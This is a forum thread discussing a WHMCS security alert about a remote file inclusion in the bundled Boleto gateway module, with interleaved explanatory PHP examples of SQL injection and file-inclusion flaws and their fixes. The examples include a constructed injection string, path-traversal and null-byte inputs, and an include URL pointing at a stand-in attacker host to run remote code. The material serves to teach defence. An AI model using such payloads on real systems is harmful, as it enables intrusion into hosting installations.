New WHMCS Vulnerability - Page 2
Comments

  • KuJoe Member, Host Rep

    @GetKVM_Ash said: Nothing in SPAM here (I use Google Apps also). Judging by the look of it nobody got an email; it doesn't take this long to send out, I don't care how big their client base is.

    I got an e-mail from them prior to my post (I guess I am one of the lucky ones, I use Google Apps also).

  • @GetKVM_Ash said: Has anybody else got an email about this? Or are we expected to find it ourselves on WHT :S

    I got the email before coming here and seeing this.

  • Just got this in an email:

    WHMCS Security Alert
    www.whmcs.com

    We have become aware of a security issue that exists in the third party Boleto
    module included in WHMCS releases. This can potentially be used to exploit a
    WHMCS installation.

    If you do not use the Boleto module, then the quickest and easiest solution is
    to simply delete the /modules/gateways/boleto/ folder entirely after which you
    will not be at risk.

    Alternatively if you do use the module, you can download and apply the patch to
    your installation here: http://www.whmcs.com/members/dl.php?type=d&id=138

    This issue affects all WHMCS versions.

    If you have any questions or need any assistance, please do not hesitate to
    contact us. We apologize for the inconvenience.

    Kind Regards,
    The WHMCS Team
    www.whmcs.com

  • Just got the email a few hours ago

  • I received an email about an hour ago

  • Anyone actually seen the exploit yet? Another SQL injection?

  • jarland Patron Provider, Top Host, Veteran

    @MartinD You make solid points. Honestly, I don't mind this; there's going to be an exploit every now and then that people miss, it happens to the best of us. With cPanel taking an interest I'm not worried about WHMCS. cPanel isn't known for being without exploits either, but when you're on top it's impossible to employ a workforce that matches the manpower of those with malicious intent against you that act collectively and individually.

    Thanked by 2: KuJoe, Maounique
  • KuJoe Member, Host Rep

    @jarland Very nicely said.

  • PacketVM Member, Host Rep

    I got an email to my personal email at 12:07 AM (GMT) and to my business email at 2:40 AM (GMT), so quite a difference.

  • Also received an email from WHMCS last night at 11:30 PM (UTC)

  • @apollo15 said: injection

    Even worse, an RFI according to this post

  • joepie91 Member, Patron Provider

    @jarland said: @MartinD You make solid points. Honestly, I don't mind this; there's going to be an exploit every now and then that people miss, it happens to the best of us. With cPanel taking an interest I'm not worried about WHMCS. cPanel isn't known for being without exploits either, but when you're on top it's impossible to employ a workforce that matches the manpower of those with malicious intent against you that act collectively and individually.

    This has very little to do with manpower.

    This is an RFI, for crying out loud. And a stupidly simple one at that - one that could have easily been prevented with proper developers and source review.

    This is the kind of vuln you find in the code of someone that just started writing PHP 2 months ago.

  • KuJoe Member, Host Rep
    edited October 2012

    For what it's worth, the Boleto addon was written by Boleto (not WHMCS) and is not encoded. While WHMCS is at fault for not reviewing the code, the same fault can be placed on the admins putting the files on their system.

    Thanked by 1: MartinD
  • Honestly, I'm not sure how all of these SQL injections pop up... when I write stuff I always make sure to escape it (or now that I'm using MySQL PDO I always prepare it) - client input should NEVER be trusted....

    @KuJoe agreed, they should definitely be checking their stuff
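
    The escaping-versus-preparing point above, shown in running code. This is an added illustration and not code from WHMCS, the Boleto module, or the poster; it uses an in-memory SQLite database so it runs offline, and the `clients` table, its columns and the attacker string are invented for the example. The vulnerable function builds the query by concatenation; the safe one binds the value with a PDO prepared statement, so the SQL text is fixed before the input is ever seen.

```php
<?php
// Added example: string-built SQL versus a PDO prepared statement.
// Assumptions: SQLite in memory, an invented "clients" table, constructed input.

$pdo = new PDO('sqlite::memory:', null, null, [
    PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
    PDO::ATTR_EMULATE_PREPARES => false, // use real driver-side prepares where the driver supports them
]);
$pdo->exec('CREATE TABLE clients (id INTEGER PRIMARY KEY, email TEXT NOT NULL, password_hash TEXT NOT NULL)');
$pdo->exec("INSERT INTO clients (email, password_hash) VALUES ('alice@example.com', 'hash-a'), ('bob@example.com', 'hash-b')");

// Constructed attacker input: closes the string literal and appends a tautology.
$attackerInput = "nobody@example.com' OR '1'='1";

// Vulnerable: the input is pasted into the SQL text, so it can change the query's structure.
function find_client_vulnerable(PDO $pdo, string $email): array
{
    $sql = "SELECT id, email FROM clients WHERE email = '" . $email . "'";
    return $pdo->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// Hardened: the query text is fixed; the value travels as a bound parameter and is
// never parsed as SQL, whatever characters it contains.
function find_client_safe(PDO $pdo, string $email): array
{
    $stmt = $pdo->prepare('SELECT id, email FROM clients WHERE email = :email');
    $stmt->execute([':email' => $email]);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

$leaked = find_client_vulnerable($pdo, $attackerInput); // every row comes back
$safe   = find_client_safe($pdo, $attackerInput);       // no row matches that literal string

printf("vulnerable query returned %d rows, prepared query returned %d rows\n",
    count($leaked), count($safe));
```

    Escaping with a function such as `mysql_real_escape_string()` only protects values that sit inside quotes; an integer dropped into `WHERE id = $id` unquoted is still injectable after escaping, which is one reason prepared statements are the safer habit.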

  • Oliver Member, Host Rep

    The software has a bug, someone finds it, it is fixed. What's bad here? This is what we should expect from WHMCS IMO, it's not as if they ignored it. All software has bugs...

    @MartinD said: If they did send one, it takes a while to arrive given the size of their customer base :)

    How would you know anything about the size of their custo.. oh wait. Never mind... ;-)

  • @Spencer said: You can buy WHMCS fully decrypted

    Then you can rename and edit each file/directory in order to be more secure from attack :D

  • I think WHMCS is great.
    It works just fine, it has many options and nice API.
    In addition, they fixed the bug on time and they did send an email to let their customers know about it.

    What we do after upgrading is just delete all modules we don't need.

    Thanked by 2: KuJoe, HostCheetah
  • Never heard about Boleto but seems somebody else did.

  • Typing "boleto" into google doesn't turn up a payment processor for me. Is this even in existence anymore?

  • Asad Member
    edited October 2012

    @Damian said: Typing "boleto" into google doesn't turn up a payment processor for me. Is this even in existence anymore?

    Grabbed this from the module files:
    http://boletophp.com.br/

    Anyone know what the hell this thing is? I recognise a few banks such as HSBC and Santander.

  • Santander... The Spanish one with English branches? :L

  • letbox Member, Patron Provider

    I received an email on my Yahoo mail, that's nice.

  • joepie91 Member, Patron Provider
    edited October 2012

    @Oliver said: The software has a bug, someone finds it, it is fixed. What's bad here? This is what we should expect from WHMCS IMO, it's not as if they ignored it. All software has bugs...

    1. This vulnerability was trivial and an entry-level developer mistake - it should not have existed and passed code review in the first place. "All software has bugs" is a nonsense argument in this case. Proper software has code reviews and security audits that pick out trivial RFI vulnerabilities like this if the developer is incompetent enough to create such a situation in the first place. Unpredictable and harmless bugs are a whole different story.
    2. Customers were not properly informed of the vulnerability. No, they weren't. If you encounter an issue like this, you make sure that the e-mail arrives straight-away for all customers. If that costs you a pretty penny because you have to sign up for SendGrid, that's your risk of doing business.
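
    For readers who have not seen one, this is what the "trivial" remote file inclusion that joepie91 describes (here and in the earlier comment about entry-level PHP mistakes) typically looks like, beside two ways of preventing it. This is an added illustration, not the Boleto module's code or anything from WHMCS; the `template` parameter, the `templates/` directory and the function names are assumptions made for the example, and the module's actual flaw is not described on this page.

```php
<?php
// Added illustration of a remote file inclusion (RFI) and its fix.
// Not the Boleto module's code: the "template" parameter, the templates/
// directory and the function names are assumptions made for this example.

// Vulnerable: request input chooses what gets include()d.
// With allow_url_include=On in php.ini, ?template=http://attacker.example/x?
// makes PHP fetch and execute attacker code (the trailing "?" turns the appended
// ".php" into a query string). With it Off, ../ traversal still turns this into
// a local file inclusion of anything readable on disk.
function render_template_vulnerable(string $template): void
{
    include $template . '.php';   // DO NOT DO THIS
}

// Fix 1 (preferred): a fixed allowlist. The request picks a key, never a path.
function render_template_safe(string $template): void
{
    $allowed = [
        'invoice' => __DIR__ . '/templates/invoice.php',
        'receipt' => __DIR__ . '/templates/receipt.php',
    ];
    if (!isset($allowed[$template])) {
        http_response_code(400);
        exit('unknown template');
    }
    include $allowed[$template];
}

// Fix 2 (when the file set is not fixed): accept only a plain name, resolve it
// under one directory, and verify the real path stays inside that directory.
// Returns the absolute path, or null if the name is rejected or the file is absent.
function resolve_in_dir(string $baseDir, string $name): ?string
{
    // No scheme, slash, dot or NUL byte can pass this pattern.
    if (!preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $name)) {
        return null;
    }
    $base = realpath($baseDir);
    $path = realpath($baseDir . '/' . $name . '.php');
    if ($base === false || $path === false) {
        return null;   // directory missing or file does not exist
    }
    // realpath() follows symlinks, so a link that points outside $baseDir fails here.
    $prefix = $base . DIRECTORY_SEPARATOR;
    return strncmp($path, $prefix, strlen($prefix)) === 0 ? $path : null;
}

// Demonstration with constructed inputs; nothing is actually included.
// "invoice" is accepted only if templates/invoice.php exists next to this script.
$attempts = [
    'invoice',
    '../../configuration',
    'http://attacker.example/shell',
    "invoice\0",
];
foreach ($attempts as $name) {
    $verdict = resolve_in_dir(__DIR__ . '/templates', $name) !== null ? 'accepted' : 'rejected';
    printf("%-34s %s\n", addcslashes($name, "\0"), $verdict);
}
```

    Alongside the code fix, check the interpreter: `allow_url_include` has defaulted to Off since PHP 5.2 and should stay Off, which turns an RFI of this shape into a local inclusion at worst rather than arbitrary remote code execution. It is a mitigation, not a substitute for the allowlist.
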
  • @Oliver said: How would you know anything about the size of their custo.. oh wait. Never mind... ;-)

    Not entirely sure what you're alluding to here; however, if it's the WHMCS DB leak, I'd like to see what evidence you have to suggest I know anything about the data contained therein.

  • Oliver Member, Host Rep

    joepie91, OK.

    MartinD, their customer base is huge.

    :-)
